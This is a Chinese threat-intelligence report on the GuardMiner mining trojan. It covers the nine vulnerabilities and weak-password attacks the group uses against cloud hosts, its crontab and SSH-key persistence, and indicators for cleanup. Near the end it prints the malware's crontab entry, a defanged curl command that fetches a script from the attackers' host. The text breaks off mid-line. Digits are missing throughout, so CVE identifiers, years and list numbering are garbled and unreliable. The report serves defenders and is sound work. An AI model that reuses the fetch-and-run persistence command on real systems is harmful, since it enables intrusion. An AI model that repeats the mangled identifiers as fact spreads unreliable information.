一、概述
腾讯安全威胁情报中心检测到GuardMiner挖矿木马团伙新的攻击活动,该团伙利用Elasticsearch远程代码执行漏洞(CVE--)等9种漏洞武器针对云上主机发起攻击。根据检测数据推算,受害主机已过万台,该挖矿木马会卸载云主机安装的安全软件。腾讯安全专家建议企业安全运维人员积极修复服务器组件漏洞,避免使用弱口令,防止云主机被该团伙使用的漏洞武器攻陷。
GuardMiner最早出现于年,至今已活跃超过年,该挖矿木马通过Go语言编写的二进制程序针对Windows平台和Linux平台进行攻击传播,通过crontab定时任务以及安装SSH公钥后门进行持久化控制,并且还会利用比特币的交易记录来动态更新C地址。
分析发现,GuardMiner挖矿团伙最新的攻击活动利用了多达9种攻击传播手法:1)CCTV设备RCE漏洞;)Redis未授权访问漏洞;)Drupal框架CVE--漏洞;4)Hadoop未授权访问漏洞;5)SpringRCE漏洞CVE--17;6)ThinkphpV5高危漏洞;7)WebLogicRCE漏洞CVE--;8)SQLServer弱口令爆破;9)ElasticsearchRCE漏洞CVE--、CVE--10
GuardMiner挖矿团伙入侵云主机后的挖矿行为会对服务器性能产生严重负面影响,服务器的正常业务有中断或崩溃风险。挖矿团伙在失陷服务器留置后门,关闭linux防火墙、卸载云服务器安全软件等行为,会导致服务器安全性受损,增加被其他黑客组织攻击的风险。
排查和加固由于GuardMiner掌握较强的自动化攻击和扩散感染能力,腾讯安全专家建议企业及时检查以下位置并进行清理,同时对服务器使用的相关组件进行版本检查和漏洞修复,对于Redis、SQLServer使用的弱密码尽快予以纠正。文件和进程
/etc/phpguard/etc/phpupdate/etc/networkmanager
Crontab任务:
*/0****sh/etc/newdat.sh*/****curl-fsSLhxxp://h.epelcdn.